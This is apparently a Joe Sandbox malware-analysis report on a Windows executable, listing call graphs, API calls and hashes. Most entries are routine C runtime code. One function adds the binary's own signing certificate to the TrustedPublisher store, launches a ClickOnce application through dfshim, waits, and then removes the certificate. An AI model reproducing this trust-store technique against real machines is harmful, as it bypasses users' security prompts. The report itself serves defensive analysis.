6274->6276 6275->6259 6277 f53819 6276->6277 6278 f5473d _abort 21 API calls 6277->6278 6279 f53824 6278->6279 6279->6259 6281 f51674 6280->6281 6282 f51670 6280->6282 6283 f51681 ___scrt_release_startup_lock 6281->6283 6284 f5191f 4 API calls 6281->6284 6282->6262 6283->6262 6285 f516ea 6284->6285 6303 f517c4 6286->6303 6289->6267 6341 f53e2a 6290->6341 6292 f518cb 6293 f518d2 6292->6293 6294 f5191f 4 API calls 6292->6294 6293->6269 6295 f518da 6294->6295 6295->6269 6297 f54424 _abort 33 API calls 6296->6297 6298 f5389c 6297->6298 6299 f547f9 _free 15 API calls 6298->6299 6302 f538d4 6298->6302 6300 f538c9 6299->6300 6301 f5473d _abort 21 API calls 6300->6301 6301->6302 6302->6271 6304 f517d3 6303->6304 6305 f517da 6303->6305 6309 f53c81 6304->6309 6312 f53cf1 6305->6312 6308 f517d8 6308->6265 6310 f53cf1 24 API calls 6309->6310 6311 f53c93 6310->6311 6311->6308 6315 f539f8 6312->6315 6318 f5392e 6315->6318 6317 f53a1c 6317->6308 6319 f5393a ___scrt_is_nonwritable_in_current_image 6318->6319 6326 f556e2 EnterCriticalSection 6319->6326 6321 f53948 6327 f53b40 6321->6327 6323 f53955 6337 f53973 6323->6337 6325 f53966 _abort 6325->6317 6326->6321 6328 f53b56 _abort 6327->6328 6329 f53b5e 6327->6329 6328->6323 6329->6328 6330 f5681b 24 API calls 6329->6330 6336 f53bb7 6329->6336 6333 f53bad 6330->6333 6331 f5681b 24 API calls 6332 f53bcd 6331->6332 6334 f54869 _free 15 API calls 6332->6334 6335 f54869 _free 15 API calls 6333->6335 6334->6328 6335->6336 6336->6328 6336->6331 6340 f5572a LeaveCriticalSection 6337->6340 6339 f5397d 6339->6325 6340->6339 6342 f53e48 6341->6342 6346 f53e68 6341->6346 6343 f547f9 _free 15 API calls 6342->6343 6344 f53e5e 6343->6344 6345 f5473d _abort 21 API calls 6344->6345 6345->6346 6346->6292 6082 f54c8a 6087 f54cbf 6082->6087 6085 f54ca6 6086 f54869 _free 15 API calls 6086->6085 6088 f54cd1 6087->6088 6089 f54c98 6087->6089 6090 f54cd6 6088->6090 6091 f54d01 6088->6091 6089->6085 6089->6086 6092 f5480c _abort 15 API calls 6090->6092 6091->6089 6098 f5681b 6091->6098 6093 f54cdf 6092->6093 6095 f54869 _free 15 API calls 6093->6095 6095->6089 6096 f54d1c 6097 f54869 _free 15 API calls 6096->6097 6097->6089 6099 f56826 6098->6099 6100 f5684e 6099->6100 6101 f5683f 6099->6101 6102 f5685d 6100->6102 6107 f57e13 6100->6107 6103 f547f9 _free 15 API calls 6101->6103 6114 f57e46 6102->6114 6106 f56844 _abort 6103->6106 6106->6096 6108 f57e33 HeapSize 6107->6108 6109 f57e1e 6107->6109 6108->6102 6110 f547f9 _free 15 API calls 6109->6110 6111 f57e23 6110->6111 6112 f5473d _abort 21 API calls 6111->6112 6113 f57e2e 6112->6113 6113->6102 6115 f57e53 6114->6115 6116 f57e5e 6114->6116 6118 f562ff 16 API calls 6115->6118 6117 f57e66 6116->6117 6124 f57e6f _abort 6116->6124 6119 f54869 _free 15 API calls 6117->6119 6122 f57e5b 6118->6122 6119->6122 6120 f57e74 6123 f547f9 _free 15 API calls 6120->6123 6121 f57e99 HeapReAlloc 6121->6122 6121->6124 6122->6106 6123->6122 6124->6120 6124->6121 6125 f56992 _abort 2 API calls 6124->6125 6125->6124

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,00000104), ref: 00F51016
                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00F51025
                                                                                                                                                                                • CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00F51032
                                                                                                                                                                                • LocalAlloc.KERNELBASE(00000000,00040000), ref: 00F51057
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,00040000), ref: 00F51063
                                                                                                                                                                                • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00F51082
                                                                                                                                                                                • CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 00F510B2
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,?), ref: 00F510C5
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,00002000), ref: 00F510F4
                                                                                                                                                                                • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 00F5110A
                                                                                                                                                                                • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 00F5111A
                                                                                                                                                                                • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 00F5112D
                                                                                                                                                                                • CertFreeCertificateContext.CRYPT32(00000000), ref: 00F51134
                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 00F5113E
                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 00F5115D
                                                                                                                                                                                • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 00F5116E
                                                                                                                                                                                • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00F51182
                                                                                                                                                                                • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00F51198
                                                                                                                                                                                • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 00F511A9
                                                                                                                                                                                • LoadLibraryA.KERNELBASE(dfshim), ref: 00F511BA
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 00F511C6
                                                                                                                                                                                • Sleep.KERNELBASE(00009C40), ref: 00F511E8
                                                                                                                                                                                • CertDeleteCertificateFromStore.CRYPT32(?), ref: 00F5120B
                                                                                                                                                                                • CertCloseStore.CRYPT32(?,00000000), ref: 00F5121A
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00F51223
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00F51228
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00F5122D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                • API String ID: 335784236-860318880
                                                                                                                                                                                • Opcode ID: e5af08840baf65df6d0486a53e7be090f5c2e449f8c0643c20c98d752faca017
                                                                                                                                                                                • Instruction ID: c9d6db2612414b7c761e39c364596765efd4517b90db731e88f7caae79daea81
                                                                                                                                                                                • Opcode Fuzzy Hash: e5af08840baf65df6d0486a53e7be090f5c2e449f8c0643c20c98d752faca017
                                                                                                                                                                                • Instruction Fuzzy Hash: E1614E71A4031CABEB219B94DC45FAFBBB9FF48B52F100055EB14B72D0C771A905ABA4
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00F5192B
                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00F519F7
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F51A10
                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00F51A1A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                • Opcode ID: 58a75c914891cda4ce78f2a52ada0545dd8f7b1070874bb6542ed2a39f0c4a79
                                                                                                                                                                                • Instruction ID: 54cf8d52634072542b7072cb0db3a0bfaf3f84c4e92e5188f0600f8393dad9c5
                                                                                                                                                                                • Opcode Fuzzy Hash: 58a75c914891cda4ce78f2a52ada0545dd8f7b1070874bb6542ed2a39f0c4a79
                                                                                                                                                                                • Instruction Fuzzy Hash: 71311875D013189BDB21DF64DD497CDBBB8BF08301F1041AAE90DAB290EB759A84DF45
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00F5466B
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F54675
                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F54682
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                • Opcode ID: 8a44434db0e3c1f5f761d39b2479767e26d7423ec19d8071c8b03a13ee826fe1
                                                                                                                                                                                • Instruction ID: 746a8183eb416173e34796c3c66ccf6efd1026351a52037eda4d857e5117893f
                                                                                                                                                                                • Opcode Fuzzy Hash: 8a44434db0e3c1f5f761d39b2479767e26d7423ec19d8071c8b03a13ee826fe1
                                                                                                                                                                                • Instruction Fuzzy Hash: 8531D37490121CABCB21DF64DC88B8DBBB8BF08311F5041EAE91CA7290EB749B859F45
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,00F5364D,?,00F602E0,0000000C,00F537A4,?,00000002,00000000,?,00F53F66,00000003,00F5209F,00F51AFC), ref: 00F53698
                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00F5364D,?,00F602E0,0000000C,00F537A4,?,00000002,00000000,?,00F53F66,00000003,00F5209F,00F51AFC), ref: 00F5369F
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00F536B1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                • Opcode ID: 09d0ca039b90683c76180363433c897fb6a765a08765fc7cac23a6f92f405394
                                                                                                                                                                                • Instruction ID: db9d581be84b2ed646dd65a2a553641482e8f89d7bc9830e9095a77ae00f1681
                                                                                                                                                                                • Opcode Fuzzy Hash: 09d0ca039b90683c76180363433c897fb6a765a08765fc7cac23a6f92f405394
                                                                                                                                                                                • Instruction Fuzzy Hash: F0E09231410648ABCF11AF58DD09A5A3B69AF40796B004018FF559A2B1DB39DA46EA90
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: .
                                                                                                                                                                                • API String ID: 0-248832578
                                                                                                                                                                                • Opcode ID: 0ed20c7a46c3a50588492960f8c049d22ffb453fc9ffff070977e5e5042ea4d0
                                                                                                                                                                                • Instruction ID: ec146a1a362a3bfc12d16687b0281206cf3e8ddd198a81a9313350dcc8f6c3dd
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ed20c7a46c3a50588492960f8c049d22ffb453fc9ffff070977e5e5042ea4d0
                                                                                                                                                                                • Instruction Fuzzy Hash: 2931E671D002497BCB249E78CC84FFB7BBDEB85319F044198FA19D7251E674AD889B50
                                                                                                                                                                                APIs
                                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F5A490,?,?,00000008,?,?,00F5A130,00000000), ref: 00F5A6C2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                • Opcode ID: 1d24817622248de0a37a443774e546bb77e4fc1bc0ecb54d2eeffb5cc6c23467
                                                                                                                                                                                • Instruction ID: 57610a730bae039e8f8f2ce45c39bd25c2b4b6957d8490e928270b79825ec87b
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d24817622248de0a37a443774e546bb77e4fc1bc0ecb54d2eeffb5cc6c23467
                                                                                                                                                                                • Instruction Fuzzy Hash: FCB17F32510608CFD715CF28C48AB647BE0FF04366F298658EE9ACF2A1C335D9A6DB41
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F51BEA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                                                                • Opcode ID: 6b04518de8737ed3437dec8c2360a0cdfa4261fa515915fd5fffe77696bde311
                                                                                                                                                                                • Instruction ID: 66574a904757c3973c90b0f9cd41315f48ddc15b9659c1143472280e33b53976
                                                                                                                                                                                • Opcode Fuzzy Hash: 6b04518de8737ed3437dec8c2360a0cdfa4261fa515915fd5fffe77696bde311
                                                                                                                                                                                • Instruction Fuzzy Hash: E551BFB1E102098FEB15CF64D9857AEBBF0FB88325F18812AC911EB290D3B5AD44DF50
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00F51300), ref: 00F51AB1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                • Opcode ID: 196de356ecca64fc24d3493574e93edb955c004c1e1d1659c3354e680b9698ec
                                                                                                                                                                                • Instruction ID: 094dde747b4cfec3f90e6f1996635de2ebd02552048c45d97235c8aa2b585b32
                                                                                                                                                                                • Opcode Fuzzy Hash: 196de356ecca64fc24d3493574e93edb955c004c1e1d1659c3354e680b9698ec
                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                • Opcode ID: 137917a717f2dc281d0dada550229ed358959a61e259d3e03d99e1b092ed0c4a
                                                                                                                                                                                • Instruction ID: 4c7ebf185cf40fc7bce43dd364924137032d4c77f1d1bd3ef2b3564e0fe81982
                                                                                                                                                                                • Opcode Fuzzy Hash: 137917a717f2dc281d0dada550229ed358959a61e259d3e03d99e1b092ed0c4a
                                                                                                                                                                                • Instruction Fuzzy Hash: 52A02230300B0ECF83C0CF30AF8A30C3AECAB02AC2B020028E208C0030EB388080BF02

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 81 f56507-f5651b 82 f5651d-f56522 81->82 83 f56589-f56591 81->83 82->83 84 f56524-f56529 82->84 85 f56593-f56596 83->85 86 f565d8-f565f0 call f5667a 83->86 84->83 87 f5652b-f5652e 84->87 85->86 89 f56598-f565d5 call f54869 * 4 85->89 95 f565f3-f565fa 86->95 87->83 90 f56530-f56538 87->90 89->86 93 f56552-f5655a 90->93 94 f5653a-f5653d 90->94 100 f56574-f56588 call f54869 * 2 93->100 101 f5655c-f5655f 93->101 94->93 97 f5653f-f56551 call f54869 call f56078 94->97 98 f565fc-f56600 95->98 99 f56619-f5661d 95->99 97->93 105 f56616 98->105 106 f56602-f56605 98->106 109 f56635-f56641 99->109 110 f5661f-f56624 99->110 100->83 101->100 107 f56561-f56573 call f54869 call f56176 101->107 105->99 106->105 116 f56607-f56615 call f54869 * 2 106->116 107->100 109->95 114 f56643-f56650 call f54869 109->114 111 f56626-f56629 110->111 112 f56632 110->112 111->112 119 f5662b-f56631 call f54869 111->119 112->109 116->105 119->112
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 00F5654B
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F56095
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F560A7
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F560B9
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F560CB
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F560DD
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F560EF
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F56101
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F56113
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F56125
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F56137
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F56149
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F5615B
                                                                                                                                                                                  • Part of subcall function 00F56078: _free.LIBCMT ref: 00F5616D
                                                                                                                                                                                • _free.LIBCMT ref: 00F56540
                                                                                                                                                                                  • Part of subcall function 00F54869: HeapFree.KERNEL32(00000000,00000000,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?), ref: 00F5487F
                                                                                                                                                                                  • Part of subcall function 00F54869: GetLastError.KERNEL32(?,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?,?), ref: 00F54891
                                                                                                                                                                                • _free.LIBCMT ref: 00F56562
                                                                                                                                                                                • _free.LIBCMT ref: 00F56577
                                                                                                                                                                                • _free.LIBCMT ref: 00F56582
                                                                                                                                                                                • _free.LIBCMT ref: 00F565A4
                                                                                                                                                                                • _free.LIBCMT ref: 00F565B7
                                                                                                                                                                                • _free.LIBCMT ref: 00F565C5
                                                                                                                                                                                • _free.LIBCMT ref: 00F565D0
                                                                                                                                                                                • _free.LIBCMT ref: 00F56608
                                                                                                                                                                                • _free.LIBCMT ref: 00F5660F
                                                                                                                                                                                • _free.LIBCMT ref: 00F5662C
                                                                                                                                                                                • _free.LIBCMT ref: 00F56644
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                • Opcode ID: 2b941e45293e4a48682c13e483be2f6f19103d7cc048aea9b1024c7d5f2b4120
                                                                                                                                                                                • Instruction ID: cc73eaca4ecbae9d008a05b0edb4276002cc1eec8b3296e22b81ffdb30d80f52
                                                                                                                                                                                • Opcode Fuzzy Hash: 2b941e45293e4a48682c13e483be2f6f19103d7cc048aea9b1024c7d5f2b4120
                                                                                                                                                                                • Instruction Fuzzy Hash: 04319071A003009FDB70AB7ADC05B5673E8EF50326F984429FA69DB191DE34FD88A750

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 138 f54330-f54341 139 f54343-f5434c call f54869 138->139 140 f5434d-f543d8 call f54869 * 9 call f541f6 call f54246 138->140 139->140
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 00F54344
                                                                                                                                                                                  • Part of subcall function 00F54869: HeapFree.KERNEL32(00000000,00000000,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?), ref: 00F5487F
                                                                                                                                                                                  • Part of subcall function 00F54869: GetLastError.KERNEL32(?,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?,?), ref: 00F54891
                                                                                                                                                                                • _free.LIBCMT ref: 00F54350
                                                                                                                                                                                • _free.LIBCMT ref: 00F5435B
                                                                                                                                                                                • _free.LIBCMT ref: 00F54366
                                                                                                                                                                                • _free.LIBCMT ref: 00F54371
                                                                                                                                                                                • _free.LIBCMT ref: 00F5437C
                                                                                                                                                                                • _free.LIBCMT ref: 00F54387
                                                                                                                                                                                • _free.LIBCMT ref: 00F54392
                                                                                                                                                                                • _free.LIBCMT ref: 00F5439D
                                                                                                                                                                                • _free.LIBCMT ref: 00F543AB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 5b5b35e8295c1fdf7dfe9758c52d2790036aff1ed820bc4701fcd1dc182e3731
                                                                                                                                                                                • Instruction ID: 70d4a62e9b9880728593b301d84cf3eb0ef7515ded83a59c6edf6e52881277ce
